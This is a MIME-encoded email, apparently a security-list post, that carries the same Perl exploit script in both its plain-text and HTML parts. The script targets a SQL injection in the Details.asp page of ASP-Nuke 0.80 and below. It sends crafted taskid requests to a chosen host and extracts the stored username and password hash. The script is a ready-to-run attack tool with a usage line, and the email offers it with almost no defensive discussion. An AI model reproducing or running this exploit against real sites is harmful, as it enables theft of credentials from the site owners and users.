This is a multi-part message in MIME format.

------=_NextPart_000_0032_01C5473D.B3E3E000
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

http://icis.digitalparadox.org/exploits/xpl_detail.pl
=20
#!/usr/bin/perl

use IO::Socket;
use Getopt::Std;
print "[x]ASP NUKE 0.80 and below Details.asp Sql Injection Exploit\n";
print "[x]By Diabolic Crab\n";
print "[x]http://www.digitalparadox.org\n\n";

getopt("h:p:");

$opt_p ||=3D 80;

if(!$opt_h) {
    die("[x] Usage: $0 -h <host> [-p <port>]\n");
}

$sqlpass =3D "/module/support/task/detail.asp?taskid=3DPassword-- =
HTTP/1.0\n";
$sqllogin =3D "/module/support/task/detail.asp?taskid=3DUsername-- =
HTTP/1.0\n";

print "[x] Host: $opt_h\n";
print "[x] Port: $opt_p\n";

$Q1 =3D "GET $sqllogin";
$Q1 .=3D "Host: ".$opt_h."\n\n";

$Q2 =3D "GET $sqlpass";
$Q2 .=3D "Host: ".$opt_h."\n\n";

$s =3D IO::Socket::INET->new(Proto =3D> 'tcp', PeerAddr =3D> $opt_h, =
PeerPort =3D> $opt_p) or die("Can't connect!");
$s->send($Q1);
$s->recv($usr, 1024);

$s =3D IO::Socket::INET->new(Proto=3D>'tcp', PeerAddr =3D> $opt_h, =
PeerPort =3D> $opt_p) or die("Can't connect!");
$s->send($Q2);
$s->recv($pass, 1024);

$s =3D index($usr,"'");
$e =3D index($usr,"'", $s + 1);
$f =3D $e - $s - 1;
print "[x]Username in SHA 256 is: ";
print substr($usr, $s + 1, $f);
print "\n";

$s =3D index($pass,"'");
$e =3D index($pass,"'", $s + 1);
$f =3D $e - $s - 1;
print "[x]Password hash in SHA 256 is: ";
print substr($pass, $s + 1, $f);
print "\n";
Sincerely,
Diabolic Crab
Web Security,  Research & Development
dP Security
email: dcrab@digitalparadox.org
website: http://www.digitalparadox.org=20

This message is confidential. It may also contain information that is=20
privileged or otherwise legally exempt from disclosure.=20
If you have received it by mistake please let us know by e-mail=20
immediately and delete it from your system; should also not copy=20
the message nor disclose its contents to anyone. Many thanks.


------=_NextPart_000_0032_01C5473D.B3E3E000
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2627" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2><A=20
href=3D"http://icis.digitalparadox.org/exploits/xpl_detail.pl">http://ici=
s.digitalparadox.org/exploits/xpl_detail.pl</A></FONT></DIV>
<DIV><!--StartFragment -->&nbsp;<PRE>#!/usr/bin/perl

use IO::Socket;
use Getopt::Std;
print "[x]ASP NUKE 0.80 and below Details.asp Sql Injection Exploit\n";
print "[x]By Diabolic Crab\n";
print "[x]http://www.digitalparadox.org\n\n";

getopt("h:p:");

$opt_p ||=3D 80;

if(!$opt_h) {
    die("[x] Usage: $0 -h &lt;host&gt; [-p &lt;port&gt;]\n");
}

$sqlpass =3D "/module/support/task/detail.asp?taskid=3DPassword-- =
HTTP/1.0\n";
$sqllogin =3D "/module/support/task/detail.asp?taskid=3DUsername-- =
HTTP/1.0\n";

print "[x] Host: $opt_h\n";
print "[x] Port: $opt_p\n";

$Q1 =3D "GET $sqllogin";
$Q1 .=3D "Host: ".$opt_h."\n\n";

$Q2 =3D "GET $sqlpass";
$Q2 .=3D "Host: ".$opt_h."\n\n";

$s =3D IO::Socket::INET-&gt;new(Proto =3D&gt; 'tcp', PeerAddr =3D&gt; =
$opt_h, PeerPort =3D&gt; $opt_p) or die("Can't connect!");
$s-&gt;send($Q1);
$s-&gt;recv($usr, 1024);

$s =3D IO::Socket::INET-&gt;new(Proto=3D&gt;'tcp', PeerAddr =3D&gt; =
$opt_h, PeerPort =3D&gt; $opt_p) or die("Can't connect!");
$s-&gt;send($Q2);
$s-&gt;recv($pass, 1024);

$s =3D index($usr,"'");
$e =3D index($usr,"'", $s + 1);
$f =3D $e - $s - 1;
print "[x]Username in SHA 256 is: ";
print substr($usr, $s + 1, $f);
print "\n";

$s =3D index($pass,"'");
$e =3D index($pass,"'", $s + 1);
$f =3D $e - $s - 1;
print "[x]Password hash in SHA 256 is: ";
print substr($pass, $s + 1, $f);
print "\n";
</PRE><PRE>&nbsp;</PRE></DIV>
<DIV><FONT face=3DArial size=3D2>Sincerely,<BR>Diabolic Crab<BR>Web =
Security,&nbsp;=20
Research &amp; Development<BR>dP Security<BR>email: <A=20
href=3D"mailto:dcrab@digitalparadox.org">dcrab@digitalparadox.org</A><BR>=
website:=20
<A =
href=3D"http://www.digitalparadox.org">http://www.digitalparadox.org</A> =

</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>This message is confidential. It may =
also contain=20
information that is <BR>privileged or otherwise legally exempt from =
disclosure.=20
<BR>If you have received it by mistake please let us know by e-mail=20
<BR>immediately and delete it from your system; should also not copy =
<BR>the=20
message nor disclose its contents to anyone. Many thanks.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV></BODY></HTML>

------=_NextPart_000_0032_01C5473D.B3E3E000--